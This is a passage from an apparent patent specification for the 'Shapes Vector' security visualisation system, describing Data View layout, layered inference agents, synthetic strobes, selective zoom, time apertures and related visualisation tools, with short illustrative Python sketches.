FIG. 6 shows how Data View might visualise a collection of data-oriented objects (eg. files and/or servers) which interact with one another to varying degrees. Despite using proximity to show whether an object is interacting with another, further visual mechanisms are needed for the user to be able to analyse the type of data interaction, and the current state of affairs of interaction within a specified time slice. Hence we still need visual markers which directly link one object to another, for example an open socket connection between two processes, which actually has data in transit. These objects could initially be very far apart due to previous low interaction status. However, since they are now interacting a specific connection marker may be needed to highlight this fact. Given the type of interaction, the force formulae may be adjusted so as to provide a stronger effect of interaction. However, this mechanism is restricted to classes of objects and the interaction type, whereas the user may be particularly interested in interaction between two particular object instances. Hence a visual marker link would be more appropriate. Yet, one can imagine the complexity of a view if all markers are shown simultaneously. Hence actual connection lines, their size, shape, colour, motion and location, may be switched on and off via a set of defined criteria.
As with Geo View, Data View in its preferred embodiment will come with its own Master Table describing shapes and textures for various attributes, as well as an input mechanism to describe relationships between objects based on a series of interaction possibilities. The objects presented in Data View may in some cases be quite different from those found in Geo View, while in other cases they will be similar or identical. Clearly the defining difference lies in the fact that Data View's Master Table will focus less on physical entities and more closely on logical entities and data-driven events.
Thus the preferred main features of Data View are as follows:
• 1. A set of one or more two-dimensional virtual universes in which a real-world object may be represented by one or more shapes whose visual attributes are derived from attributes of the real-world object via a flexible user-specifiable mapping (called a “Master Table”). In one embodiment each universe is represented as a disc in a plane. The placement of a shape within a universe is governed by degree of interaction between the represented object and other objects represented in that universe. As an alternative, the view may be constructed as a set of one or more three-dimensional virtual universes with similar properties.
• 2. Interaction between a pair of real-world objects causes the pair of shapes that represent them to be mutually attracted. The magnitude of this force is mathematically derived from the level of interaction. Real-world objects which interact are furthermore mutually repelled by a "gravitational force", the magnitude of which is derived from attributes of the real-world objects in a flexible user-specified manner. In one embodiment all forces are computed as vectors in the plane of the universe. The velocity of a shape in the universe is proportional to the vector sum of the forces applied to the shape (i.e., in this embodiment there is no concept of acceleration).
• 3. Shapes within a universe may be tagged with what is termed herein a “flavor” if their real-world object's attributes match a flexible user-specified condition associated with that flavor. A pair of shapes may only attract or repel one another if they share one or more flavors.
• 4. Each shape within a universe maintains an explicit list of other shapes it “interacts” with. A pair of shapes may only attract or repel one another if each is in the interaction set of the other.
• 5. Each shape within a universe may have a “radius of influence” associated with it, a user-specified region of the universe surrounding the shape. A shape may only exert a force onto another shape if the latter is within the radius of influence of the former. The radius of influence of a shape may be displayed visually. The selection of which shapes in the universe have radii of influence, and which of those radii should be displayed, may be either universal or by means of a flexible user-specified condition.
• 6. Each shape within a universe may optionally be visually linked to one or more shapes in a different universe by a “Marker” which represents a relationship between the real-world objects represented by the shapes. The selection of which shapes in which universes should be so linked is by means of a flexible user-specified condition.
• 7. Changes to the visual attributes of shapes (e.g., size or height above a plane) may be made dynamically by a user. Such changes may be applied to all shapes in the universe or to those which match user-specified criteria. This facility is termed “Selective Zoom”.
• 8. The user may configure Audio cues (sounds and/or voices) to denote the attributes of represented objects, or to denote the occurrence of a real-world event. Such cues may be associated with a point in three-dimensional space, or they may be ambient.
• 9. The representation of real-world objects with rapidly time-changing attributes may be simplified by the use of Synthetic Strobes, flexible user-specified filters which shift changes in the visual attributes of a shape from one time-domain to another. Synthetic Strobes may be applied across the entire universe or selectively according to a flexible user-specification. Such strobes may also be used to shift slow changes in the attributes of a shape into a faster domain (e.g., so that a human may perceive patterns in very slowly altering real-world objects).
• 10. A user may select shapes within a Data View universe (either interactively or by a flexible user-specified condition) and choose to have the corresponding set of shapes in another view (e.g., a Geo View or a different Data View) highlighted in a visual manner. The specification of the condition defining correspondence of shapes between universes may be made in a flexible user-defined fashion.
4 Intelligent Agents
Shapes Vector can utilise large numbers of Intelligent Agents (IA's), with different domains of discourse. These agents make inferences and pass knowledge to one another in order to arrive at a set of deductions that permit a user to make higher level hypotheses.
4.1 Agent Architecture
In order to achieve knowledge transfer between agents which is both consistent and sound, an ontology becomes imperative. The task of constructing a comprehensive ontology capable of expressing all of the various types of knowledge involved is non-trivial. The principal complication comes from the fact that the structural elements of the ontology must be capable of covering a range of knowledge ranging from the very concrete, through layers of abstraction, and ultimately to very high-level meta-knowledge. The design of a suite of ontological structures to cover such a broad semantic range is problematic: it is unlikely to produce a tidy set of universal rules, and far more prone to produce a complex family of inter-related concepts with ad hoc exceptions. More likely, due to the total domain of discourse being so broad, an ontology produced in this manner will be extremely context sensitive, leading to many possibilities for introducing ambiguities and contradictions.
To simplify the problem of knowledge representation to a point where it becomes tractable, the Shapes Vector system chooses to define a semantic layering of its knowledge-based elements. FIG. 7 shows the basic structure of this knowledge architecture and thus the primary architecture of the set of Intelligent Agents (IA's). At the very bottom of the hierarchy are factual elements, relatively concrete observations about the real world (the global knowledge base). Factual elements can be drawn upon by the next layer of knowledge elements: the simple intelligent agents. The communication of factual knowledge to these simple knowledge-based entities is by means of a simple ontology of facts (called the Level 1 Shapes Vector ontology). It is worthwhile noting that the knowledge domain defined by this ontology is quite rigidly limited to incorporate only a universe of facts—no higher-level concepts or meta-concepts are expressible in this ontology. This simplified knowledge domain is uniform enough that a reasonably clean set of ontological primitives can provide a concise description. Also, an agent may not communicate with any "peers" in its own layer. It must communicate with a higher agent employing a higher abstraction layer ontology. These higher agents may of course then communicate with a "lower agent". This rule further removes the chance of ambiguity and ontology complexities by forcing consistent domain-restricted ontologies.
An immediate and highly desirable consequence of placing these constraints on the knowledge base is that it becomes possible to represent knowledge as context-free relations. Hence the use of relational database technology in storage and management of knowledge becomes possible. Thus, for simple selection and filtering procedures on the knowledge base we can utilise well-known commercial mechanisms which have been optimised over a number of years rather than having to build a custom knowledge processor inside each intelligent agent. Note that we are not suggesting that knowledge processing and retrieval is not required in an IA, but rather that by specifying certain requirements in a relational calculus (SQL preferably), the database engine assists us by undertaking a filtering process when presenting a view for processing by the IA. Hence the IA can potentially reap considerable benefits by only having to process the (considerably smaller) subset of the knowledge base which is relevant to the IA. This approach becomes even more appealing when we consider that the implementation of choice for Intelligent Agents is typically a logic language such as Prolog. Such environments may incur significant processing delays due to the heavy stack-based nature of processing on modern Von Neumann architectures. However, by undertaking early filtering processes using optimised relational engines and a simple knowledge structure, we can minimise the total amount of data that is input into potentially time-consuming tree- and stack-based computational models.
The placement of intelligent agents within the various layers of the knowledge hierarchy is decided based upon the abstractions embodied within the agent and the knowledge transforms provided by the agent. Two criteria are considered in determining whether a placement at layer n is appropriate:
• would the agent be context sensitive in the level n ontology? If so, it should be split into two or more agents.
• does the agent perform data fusion from one or more entities at level n? If so, it must be promoted to at least level n+1 (to adhere to the requirement of no “horizontal” interaction)
Further discussion on intelligent agents and ontological issues can be found elsewhere in the specification.
4.2 Inferencing Strategies
The fundamental inferencing strategy underlying Shapes Vector is to leave inductive inferencing as the province of the (human) user and deductive inferencing as typically the province of the IA's. It is expected that a user of the system will examine deductive inferences generated by a set of IA's, coupled with visualisation, in order to arrive at an inductive hypothesis. This separation of duties markedly simplifies the implementation strategies of the agents themselves. Nevertheless, we propose further aspects that may produce a very powerful inferencing system.
4.2.1 Traditional
Rule based agents can employ either forward chaining or backward chaining, depending on the role they are required to fulfil. For example, some agents continuously comb their views of the knowledge base in attempts to form current, up to date, deductions that are as “high level” as possible. These agents employ forward chaining and typically inhabit the lower layers of the agent architecture. Forward chaining agents also may have data stream inputs from low level “sensors”. Based on these and other inputs, as well as a set of input priorities, these agents work to generate warnings when certain security-significant deductions become true. Another set of agents within the Shapes Vector system will be backward chaining (goal driven) agents. These typically form part of the “User Avatar Set”: a collection of knowledge elements which attempt to either prove or disprove user queries.
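As a hedged illustration of the forward-chaining style described above, the sketch below repeatedly combs a small fact set and fires rules until no new deductions appear. The rule, fact tuples and deduction names are invented for this example and are not drawn from any actual Shapes Vector rule base.

```python
# Invented example facts: (predicate, host, value) triples.
facts = {("open_port", "hostA", 23), ("login_failure", "hostA", "repeated")}

def rule_telnet_probe(fs):
    # fires when a host shows both an open telnet port and repeated failures
    open_telnet = {h for (p, h, v) in fs if p == "open_port" and v == 23}
    failing = {h for (p, h, v) in fs if p == "login_failure" and v == "repeated"}
    return {("suspected_probe", h, "telnet") for h in open_telnet & failing}

rules = [rule_telnet_probe]

changed = True
while changed:            # forward chain until a fixed point is reached
    changed = False
    for rule in rules:
        new = rule(facts) - facts
        if new:
            facts |= new
            changed = True
```

A backward-chaining agent would instead start from a user query (a goal) and work back through the rules looking for supporting facts.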
4.2.2 Vectors
While the traditional approach to inferencing is sufficient for simple IA's which deal principally in the domain of concrete fact, it is less suitable for agents (typically from higher layers) which must deal with uncertain and/or incomplete information. Typically, such agents operate in a more continuous knowledge domain than that underlying rule-based deductive inferencing, and as such are not easily expressed in either a purely traditional forward or backward chaining paradigm. For these higher level agents, we instead make use in this embodiment of an alternative inferencing strategy based upon notions of vector algebra in a multi-dimensional semantic space. This alternative strategy is employed in conjunction with more conventional backward chaining techniques. The use of each of the paradigms is dependent on the agent, and the domain of discourse.
Our vector-based approach to inferencing revolves around constructing an abstract space in which relevant facts and deductions may be represented by geometrical analogues (such as points and vectors), with the proper algebraic relationships holding true. In general, the construction of such a space for a large knowledge domain is extremely difficult. For Shapes Vector, we adopt a simplifying strategy of constructing several distinct deductive spaces, each limited to the (relatively small) domain of discourse of a single intelligent agent. The approach is empirical and is only feasible if each agent is restricted to a very small domain of knowledge so that construction of its space is not overly complex.
The definition of the deductive space for an IA is a methodical and analytical process undertaken during the design of the agent itself. It involves a consideration of the set of semantic concepts ("nouns") which are relevant to the agent, and across which the agent's deductions operate. Typically this concept set will contain elements of the agent's layer ontology as well as nouns which are meaningful only within the agent itself. Once the agent's concept set has been discovered, we can identify within it a subset of 'base nouns': concepts which cannot be defined in terms of other members of the set. This identification is undertaken with reference to a semi-formal 'connotation spectrum' (a comparative metric for ontological concepts).
Such nouns have two important properties:
• each is semantically orthogonal to every other base noun, and
• every member of the concept set which is not a base noun can be described as a combination of two or more base nouns.
Collectively, an IA's set of n base nouns defines an n-dimensional semantic space (in which each base noun describes an axis). Deductions relevant to the agent constitute points within this space; the volume bounded by spatial points for the full set of agent deductions represents the sub-space of possible outputs from that agent. A rich set of broad-reaching deductions leads to a large volume of the space being covered by the agent, while a limited deduction set results in a very narrow agent of more limited utility (but easier to construct). Our present approach to populating the deductive space is purely empirical, driven by human expert knowledge. The onus is thus upon the designer of the IA to generate a set of deductions which (ideally) populate the space in a uniform manner. In reality, the set of deductions which inhabit the space can become quite non-uniform ("clumpy") given this empirical approach. Hence rigorous constraint on the domain covered by an agent is entirely appropriate. Of course this strategy requires an appropriate mechanism at a higher abstraction layer. However, the population of a higher layer agent can utilise the agents below it in a behavioural manner, thereby treating them as sub-spaces.
Once an agent's deductive space has been constructed and populated with deductions (points), it may be used to draw inferences from observed facts. This is achieved by representing all available and relevant facts as vectors in the multi-dimensional semantic space and considering how these vectors are located with respect to deduction points or volumes. A set of fact vectors, when added using vector algebra, may precisely reach a deduction point in the space. In that situation, a deductive inference is implied. Alternatively, even in the situation where no vector or combination of vectors precisely inhabits a deduction point, more uncertain reasoning can be performed using mechanisms such as distance metrics. For example, it may be implied that a vector which is "close enough" to a deduction point is a weak indicator of that deduction. Furthermore, in the face of partial data, vector techniques may be used to home in on inferences by identifying facts (vectors), currently not asserted, which would allow for some significant deduction to be drawn. Such a situation may indicate that the system should perhaps direct extra resources towards discovering the existence (or otherwise) of a key fact.
The actual inferencing mechanism to be used within higher-level Shapes Vector agents is slightly more flexible than the scheme we have described above. Rather than simply tying facts to vectors defined in terms of the IA's base nouns, we instead define an independent but spatially continuous ‘fact space’. FIG. 8 demonstrates the concept: a deductive space has been defined in terms of a set of base nouns relevant to the IA. Occupying the same spatial region is a fact space, whose axes are derived from the agent's layer ontology. Facts are defined as vectors in this second space: that is, they are entities fixed with respect to the fact axes. However, since the fact space and deduction space overlap, these fact vectors also occupy a location with respect to the base noun axes. It is this location which we use to make deductive inferences based upon fact vectors. Thus, in the figure, the existence of a fact vector (arrow) close to one of the deductions (dots) may allow for assertion of that deduction with a particular certainty value (a function of exactly how close the vector is to the deduction point). Note that, since the axes of the fact space are independent of the axes of the deductive space, it is possible for the former to vary (shift, rotate and/or translate, perhaps independently) with respect to the latter. If such a variation occurs, fact vectors (fixed with regard to the fact axes) will have different end-points in deduction-space. Therefore, after such a relative change in axes, a different set of deductions may be inferred with different confidence ratings. This mechanism of semantic relativity may potentially be a powerful tool for performing deductive inferencing in a dynamically changing environment.
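A minimal sketch of the vector-based scheme follows, under the simplifying assumption that fact vectors are expressed directly in the deduction space (the separate fact space and its relative shift are omitted). The base nouns, deduction points and fact vectors are invented for illustration, and certainty is computed here as a simple linear fall-off with distance, which is only one of many possible metrics.

```python
import math

# Axes of the agent's semantic space: its base nouns (illustrative names).
BASE_NOUNS = ("host", "service", "anomaly")

# Deduction points in the n-dimensional space (invented coordinates).
DEDUCTIONS = {
    "port_scan_in_progress": (1.0, 2.0, 3.0),
    "benign_maintenance":    (1.0, 1.0, 0.5),
}

def infer(fact_vectors, radius=1.0):
    """Sum the fact vectors and weakly assert any deduction whose point lies
    within `radius` of the sum; certainty falls off linearly with distance."""
    total = [sum(v[i] for v in fact_vectors) for i in range(len(BASE_NOUNS))]
    assertions = []
    for name, point in DEDUCTIONS.items():
        dist = math.dist(total, point)
        if dist <= radius:
            assertions.append((name, 1.0 - dist / radius))
    return assertions

# Two observed facts expressed as vectors over the base-noun axes.
print(infer([(0.5, 1.0, 1.5), (0.5, 1.0, 1.4)]))
# -> [('port_scan_in_progress', 0.9)] approximately
```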
An interesting aspect of our approach to vector-based deductive inference is that it is based fundamentally upon ontological concepts, which can in turn be expressed as English nouns. This has the effect that the deductions made by an agent will resemble simple sentences in a very small dialect of pseudo-English. This language may be a useful medium for a human to interact with the agent in a relatively natural fashion.
While the inferencing strategy described above has some unorthodox elements in its approach to time-varying probabilistic reasoning for security applications, there are more conventional methods which may be used within Shapes Vector IA's in the instance that the method falls short of its expected deductive potential.
As described above, the vector-based deductive engine is able to make weak assertions of a deduction with an associated certainty value (based on distances in n-dimensional space). This value can be interpreted in a variety of ways to achieve different flavours of deductive logic. For example, the certainty value could potentially be interpreted as a probability of the assertion holding true, derived from a consideration of the current context and encoded world knowledge. Such an interpretation delivers a true probabilistic reasoning system. Alternatively, we could potentially consider a more rudimentary interpretation wherein we consider assertions with a certainty above a particular threshold (e.g. 0.5) to be "possible" within a given context. Under these circumstances, the system would deliver a possibilistic form of reasoning. Numerous other interpretations are also possible.
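These alternative readings can be captured in a small post-processing step; the sketch below is illustrative only, taking (deduction, certainty) pairs such as those produced by the earlier vector-based sketch, and the mode names are invented.

```python
def interpret(assertions, mode="probabilistic", threshold=0.5):
    """assertions is a list of (deduction, certainty) pairs."""
    if mode == "possibilistic":
        # anything at or above the threshold is deemed "possible" in context
        return [(name, certainty >= threshold) for name, certainty in assertions]
    # probabilistic reading: treat the certainty value directly as a probability
    return assertions
```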
Frame based systems offer one well understood (although inherently limited) alternative paradigm. Indeed, it is expected that some IA's will be frame based in any case (obtained off the shelf and equipped with an ontological interface to permit knowledge transfer with the knowledge base).
Other agents based on neural nets, Bayesian, or statistical profiling may also inhabit the Agent macro-object.
4.3 Other Applications
The IA architecture lends itself to other applications. For example, it is not uncommon for Defence organisations and institutions to maintain many databases in just as many formats. It is very difficult for analysts to peruse these databases in order to gain some required insight. There has been much effort aimed at considering how particular databases may be structured in order for analysts to achieve their objectives. The problem has proved to be difficult. One of the major hurdles is that extracting the analysts' needs and codifying them to structure the data leads to different requirements not only between analysts, but also different requirements depending on their current focus. One of the consequences is that in order to structure the data correctly, it must be context sensitive, which a relational database is not equipped to handle.
Shapes Vector can overcome many of the extant difficulties by permitting knowledge and deduction rules to be installed into an IA. This IA, equipped with a flexible user interface and strictly defined query language, can then parse the data in a database in order to arrive at a conclusion. The knowledge rules and analyst-centric processing are encoded in the IA, not in the structure of the database itself, which can remain flat and context free. The Shapes Vector system allows incremental adjustment of the IA without having to re-format and restructure a database either through enhancement of the IA, or through an additional IA with relevant domain knowledge. Either the IA makes the conclusion, or it can provide an analyst with a powerful tool to arrive at low level deductions that can be used to arrive at the desired conclusion.
5 Synthetic Stroboscopes and Selective Zoom
In this section, we discuss two mechanisms for overcoming difficulties in bringing important events to the fore in a highly cluttered visual environment: Synthetic Strobes and Selective Zoom.
5.1 Synthetic Strobes
One of the major difficulties with depicting data visually in a real-time system is determining how to handle broad temporal domains. Since the human is being used to provide inductive inference at the macro level, much of the data which needs to be represented visually cannot be shown due to its temporal breadth. For example, there may be a pattern in a fast packet stream, yet if we were able to see the pattern in the packet stream, other events which may also represent a significant pattern may be happening much more slowly (e.g. a slowly revolving sphere). Yet the perception of both patterns simultaneously may be necessary in order to make an inductive hypothesis.
A scientist at MIT during World War Two invented a solution to this type of dilemma. By the use of a device (now well known in discos and dance studios) called a stroboscope, Edgerton was able to visualise patterns taking place in one temporal domain in another. One of the most striking and relatively recent examples was the visualisation of individual water droplets in an apparently continuous stream produced by a rapid impellor pump. The stream looked continuous, but viewed under the strobe, each water droplet became distinctly apparent.
We can use the same concept of strobes, ie. synthetic strobes, to bring out multi temporal periodic behaviour in the Shapes Vector visualisation process. With a synthetic strobe, we can visualise packet flow behaviour more precisely, while still retaining a view of periodic behaviour that may be occurring much more slowly elsewhere.
Since we have potentially many different events and objects within our view, it becomes necessary to extend the original strobe concept so that many different types of strobes can be applied simultaneously. Unlike the employment of photonic-based strobes, which can interfere with each other, we are able to implement strobes based on:
• Whole field of view
• Per object instance
• Per object class
• Per object attribute
In addition, multiple strobes can be applied where each has complex periodic behaviour or special overrides depending on specific conditions. The latter can also be seen from the oscilloscope perspective where a Cathode Ray Oscilloscope is triggered by an event in order to capture the periodic behaviour. Naturally, with a synthetic strobe, quite complex conditions can be specified as the trigger event.
Just as in the days of oscilloscopes, it is important to be able to have variable control over the triggering rate of a strobe. Accordingly, control of the strobes is implemented via a set of rheostats.
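A hedged sketch of a synthetic strobe follows: it passes an event through only when a user-specified trigger condition holds and the event falls on the strobe's sampling period (the "rheostat" setting), and it can be scoped to a particular object class or applied to the whole field of view. Event fields, class names and periods are assumptions made for this example.

```python
class SyntheticStrobe:
    """Passes only those events that match the trigger and fall on the
    strobe's sampling period; fields and names are illustrative."""

    def __init__(self, period, trigger, object_class=None):
        self.period = period          # rheostat-controlled sampling period
        self.trigger = trigger        # arbitrary predicate over an event
        self.object_class = object_class
        self._last = None

    def visible(self, event):
        if self.object_class and event.get("class") != self.object_class:
            return True               # not governed by this strobe
        if not self.trigger(event):
            return False
        t = event["time"]
        if self._last is None or t - self._last >= self.period:
            self._last = t
            return True
        return False

# e.g. show packet objects only once per 0.5 units of synthetic time
packet_strobe = SyntheticStrobe(
    period=0.5,
    trigger=lambda e: e.get("class") == "packet",
    object_class="packet")
```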
5.2 Selective Zoom
In order to see a pattern, it is sometimes necessary to zoom out from a vista in order to gain a very high-level view of activity in a network. While this can be quite useful, it is intuitive that important events for certain classes of object will fail to be noticed due to wide dispersal across the vista. If a class of objects typically has a large representation compared to others, then zooming out to see a pattern across a large vista is appropriate. However, if the class of objects in question is small, then zooming out causes them to be less noticeable when compared to much larger objects.
Selective Zoom overcomes this difficulty and others of a similar ilk by providing two mechanisms. The first mechanism allows a user to change quickly the relative sizes of objects in relation to others. This permits a user to zoom out in order to see a large vista while still retaining a discernible view of specific objects. The second mechanism permits movement and projection of objects onto planes “above” or “below” the primary grids used to layout a view.
As can be seen in the following paragraphs, selective zoom provides a generalised translation and rotation mechanism in three-dimensional Cartesian space.
While the above two mechanisms can surely find utility, selective zoom also provides a more sophisticated "winnowing" facility. This facility caters to a typical phenomenon in the way humans "sift" through data sets until they arrive at a suitable subset for analysis. In the case of focusing on a particular set of objects in order to undertake some inductive or deductive analysis, a human may quickly select a broad class of objects for initial analysis from the overall view despite knowing a priori that the selection may not be optimal. The user typically then either undertakes a refinement (selecting a further subset) or puts the data aside as a reference while reformulating the selection criteria. After applying the new criteria, the user may then use the reference for refinement, intersection, or union with previous criteria depending on what they see.
Via selective zoom (perhaps raised above the main view plane), a user can perform a selective zoom on a zoomed subset. This procedure can be undertaken recursively, all the while making subsets from the previous relative zoom. The effect can be made like a "staircasing" of views. FIG. 9 (segments two and three) depicts the use of selective zoom where subsets of nodes have been placed above the main view plane. Note that the set of nodes to the left was produced by a previous use of the zoom. This set need not be a subset of the current staircase.
Indeed the set to the left can be used to form rapidly a new selection criterion. The effects can be described by simple set theory. As implied above a user may also select any of the zoomed sets and translate them to another part of the field of view. These sets can also then be used again to form unions and intersections with other zoomed views or subsets of views that are generated from the main view.
Segment one of FIG. 9 depicts the same view from above. Note the schematic style.
VDI has produced a visualisation toolkit in which a particular application depicts a set of machine nodes. By clicking on a representation of a node, it is "raised" from the map and so are the nodes to which it is connected. This may be interpreted as a simple form of one aspect of selective zoom. However, it is unclear whether this VDI application is capable of the range of features forming a generalised selective zoom: for example, set translation in three-dimensional Cartesian space, union and intersection for rapid reselection and manipulation of arbitrary view sets, and relative size adjustment based on class, instance, or object attribute properties.
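Purely for illustration, the winnowing behaviour described above can be sketched with ordinary set operations over object identifiers; the object names and selection criteria below are invented.

```python
# The main view and two successive selection criteria (invented examples).
main_view = {"fw1", "hostA", "hostB", "router3", "hostC"}

zoom1 = {o for o in main_view if o.startswith("host")}       # first criterion
zoom2 = {o for o in main_view if o in ("hostB", "router3")}   # second criterion

refined   = zoom1 & zoom2                 # intersection of two zoomed subsets
combined  = zoom1 | zoom2                 # union, e.g. merging a translated set back in
staircase = [main_view, zoom1, refined]   # recursive "staircasing" of views
```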
6 Temporal Hierarchies
Temporal hierarchies refer to three perceived issues: synthetic strobes along both directions of the temporal axis; user information overload, and dealing with data streams with Intelligent Agents. We discuss each in turn.
6.1 Strobes Revisited
In Section 5 we introduced the notion of a synthetic strobe which can be used to shunt rapid periodic behaviour along a “temporal axis” so that the behaviour becomes discernible to the human eye. This shunting was necessary since many patterns of behaviour occur far too rapidly (e.g. characteristics of packet flow and their contents). However, a limitation of synthetic strobes as described is that they shunt or map patterns in only one direction along the temporal axis. More precisely, rapid behaviour is shunted into a “slower” domain. Yet some behaviour of security significance may require a view which spans a relatively long time. Hence it was hypothesised that strobes must be able to not only show up rapid behaviour, but also show slow behaviour. To do this, Shapes Vector must be able to store events, and then be able to map a strobe over them in order to display the possible pattern. Essentially, it is preferable to be able to map behaviour, which can occur along a broad front of the temporal axis into a much smaller domain, which is perceptible to Humans. As an aside, it is a well known technique to see patterns of motion in the cosmos by strobing and playing at high speed various observations, e.g. star field movement to ascertain the celestial poles. However, what we propose here, apart from the relative novelty of taking this concept into cyberspace, is the additional unusual mechanism of complex trigger events in order to perceive the “small” events, which carry so much import over “long” time periods. We can assign triggers and functions on a scale not really envisaged even in terms of cosmological playback mechanisms.
Elsewhere, we discuss many other issues related to synthetic strobes. For example, the mechanisms for setting complex trigger conditions via “trigger boxes”, the need for “synthetic time”, its relation to real time, and generated strobe effects.
6.2 User Information Overload
Another reason for using strobes, even if the pattern is already within the temporal perception domain of the user, is that they can highlight potentially important behaviour from all the "clutter". Visualisation itself is a mechanism whereby certain trends and macro events can be perceived from an information-rich data set. However, if related or semantically similar events mix together, and a particular small event is to be correlated with another, then some form of highlighting is needed to distinguish it in the visual environment. Without this sort of mechanism, the user may suffer data overload. Synthetic strobes designed to trigger on specific events, and which only affect particular classes of objects, are surmised to provide one mechanism to overcome this expected problem.
6.3 Data Streams and IA's
One of the fundamental problems facing the use of IA's in the Shapes Vector system is the changing status of propositions. More precisely, under temporal shifts, all "facts" are predicates rather than propositions. This issue is further complicated when we consider that typical implementations of IA's do not handle temporal data streams. We address this problem by providing each IA with a "time aperture" over which it is currently processing. A user or a higher-level agent can set the value of this aperture. Any output from an IA is only relevant to its time aperture setting (FIG. 10). The aperture mechanism allows the avoidance of issues such as contradictions in facts over time, as well as providing a finite data set in what is really a data stream. In fact, the mechanism being implemented in our system permits multiple, non-intersecting apertures to be defined for data input.
With time apertures, we can "stutter" or "sweep" along the temporal domain in order to analyse long streams of data. Clearly, there are a number of issues which still must be dealt with. Chief amongst these is the fact that an aperture may be set which does not cover, or only partially covers, the data set from which a critical deduction must be made. Accordingly, strategies such as aperture change and multiple apertures along the temporal domain must be implemented in order to raise confidence that the relevant data is input in order to arrive at the relevant deduction.
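A minimal sketch of the aperture mechanism is given below, assuming facts arrive as (timestamp, predicate) pairs; the sweep function "stutters" a single aperture of fixed width along the temporal axis. All names and parameters are illustrative only.

```python
def in_apertures(t, apertures):
    """apertures is a list of non-intersecting (start, end) intervals."""
    return any(start <= t < end for start, end in apertures)

def visible_facts(stream, apertures):
    # only facts inside an aperture are presented to the IA
    return [fact for fact in stream if in_apertures(fact[0], apertures)]

def sweep(stream, width, step, t0, t1):
    """Stutter a single aperture of the given width along the temporal axis."""
    t = t0
    while t < t1:
        aperture = (t, t + width)
        yield aperture, visible_facts(stream, [aperture])
        t += step
```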
While we are aware that we can implement apertures in order to supply us with useful deductions for a number of circumstances, it is still an open question as to how to achieve a set of sweep strategies for a very broad class of deductions where confidence is high that we obtain what we are scanning for. One area which comes to mind is the natural "tension" between desired aperture settings. For example, an aperture setting of 180 degrees (i.e., the whole fact space) is desirable as this considers all possible data in the stream from the beginning of the epoch of capture to the end of time, or rather the last data captured. However, this setting is impractical from an implementation point of view, as well as introducing contradictions in the deductive process. On the other hand, a very small aperture is desirable in that implementation is easy along with fast processing, but it can result in critical packets not being included in the processing scan.
7 Other Visualisation Efforts
Various techniques of visualisation have over the years been applied to the analysis of different domains of abstract data, with varying success. Several such attempts bear similarities to portions of the Shapes Vector system, either in the techniques employed or the broad aims and philosophies guiding those techniques. In this section we briefly describe the most significant of these related visualisation efforts, concentrating on the specific domains of security visualisation, network visualisation and communications-related data mining.
The following discussion providing some background to the invention is intended to facilitate a better understanding of the invention. However, it should be appreciated that the discussion is not an acknowledgment or admission that any of the material referred to was published, known or part of the common general knowledge in any relevant country as at the priority date of the application.
7.1 NetPARS
A proposal from NRaD and the NRL, the Network Propagation Assessment and Recovery System (NetPARS) is an effort to assist decision making in defensive information warfare. It aims to supply such support by means of rigorously tracking data quality within a system and estimating how degradations in quality propagate between data. Such a protocol would, it is claimed, be capable of providing intrusion detection services, assessment of security state and assist in recovery following an attack.
The proposed system architecture incorporates a set of mapping agents (responsible for keeping track of inter-relationships between data), sensor elements (capable of detecting intrusions and other reductions in data quality) and recovery elements. When a sensor detects the compromise of one or more data items, the system computes (via a forward-propagating expert system) the extent to which this loss in quality is propagated to other data. This information is presented to the user to assist in the defence and/or containment of the compromise.
Ultimately it is envisaged that NetPARS will also incorporate a second knowledge engine. This takes a reported reduction in data quality and, by backward propagation, determines the tree of data items which could conceivably have been the initial cause of that reduction. This fault tree is a principal input to the process of recovery.
Although only sketchy details of the NetPARS proposal are available at present, the system would appear to have some superficial similarities to Shapes Vector. Both make use of forward and backward propagation of knowledge through a set of rules (although the function of backward propagation is quite different in the two systems). Also, both NetPARS and Shapes Vector incorporate agents which are tasked with intrusion detection as an aid towards a human response. However, whereas the Shapes Vector architecture incorporates a broad range of such agents, it seems that the intrusion detection functionality of NetPARS is currently limited to a single class of attack (storage spoofing).
Beyond these superficial resemblances the two systems have little in common. NetPARS appears to place less importance upon visualisation technology, while in Shapes Vector this is an easily realisable feature where several novel visualisation techniques have been proposed. The NRaD/NRL proposal appears to focus heavily on a tight domain of data and its inter-relationship, while the Shapes Vector system aims to model a much larger concept space with a comprehensive ontology. Ontology can be made relevant to a great variety of application areas. Computer security as discussed in this specification is but one example. Shapes Vector also includes a potentially very powerful temporal control mechanism as well as intelligent agent architecture with user semantic bindings.
7.2 Security Visualisation
Eagle Netwatch is a commercial software package written by Raptor Systems Inc., which offers system administrators a visual representation of the security of their (firewall protected) network. The network is displayed by the tool as an interconnected set of coloured solids positioned in a three-dimensional virtual world. By replaying audit trails collected on the firewall this display is animated to illustrate particular gateway events which pertain to the system's security. During the playback of this security “movie,” the user can rotate the virtual world to more clearly observe the activities of particular network elements. The tool also offers other visualisations of audit logs, most notably two-dimensional plots of gateway statistics against time.
The basic concept underlying Eagle Netwatch—that by observing events in a visual representation of the network a (human user) may notice patterns signifying security events—is similar to the Shapes Vector philosophy as described in Section 3. However, at the time of writing this information the Netwatch tool lacks much of the sophistication of the Shapes Vector environment including the capacity for real-time visualisation, the presence of intelligent deductive agents, the possibility of remote discovery and visual mechanisms for recognising temporal patterns.
7.3 Network Visualisation
AT&T Bell have constructed a set of prototype tools, collectively called SeeNet, which provide visualisations of telecommunications traffic. The system displays the traffic between two locations by drawing a line on a two-dimensional geographical map. Line width and colour convey aspects of that traffic (e.g., volume). In visualising traffic on an international scale, the resulting map is typically wrapped around a sphere to give the impression of the globe. By observing trends in the visualised traffic, key performance bottlenecks in real-world telecommunications services (including the Internet) have been identified. Also, by investigating observed "hot spots" in these representations, AT&T have been able to identify fraudulent use of their facilities.
A similar visualisation approach has been adopted by British Telecom in a prototype system for observing the parameters of their communications network. An outline map of Britain is overlaid with a representation of the BT network with a "skyscraper" projecting upwards from each switching node. The height of the skyscraper denotes the value of the metric being visualised (e.g., traffic or number of faults). The user can navigate freely through the resulting 3D environment. A second visualisation attempt undertaken by British Telecom considers a different three-dimensional visualisation of the communication network as an aid for network architects. A similar approach has been adopted by IBM's Zurich Research Laboratories in their construction of a tool for visualising a computer network's backbone within a full three-dimensional virtual (VRML) world. The goal of this latter system is to ease the task of administering such network backbones.
While Shapes Vector can render similar scenes via its Geo View methods, there is little else in common because of the existence of Data View, Selective View and Strobe when used as part of the visual element. The agent architecture and other elements further distinguish the Shapes Vector system.
7.4 Data Mining
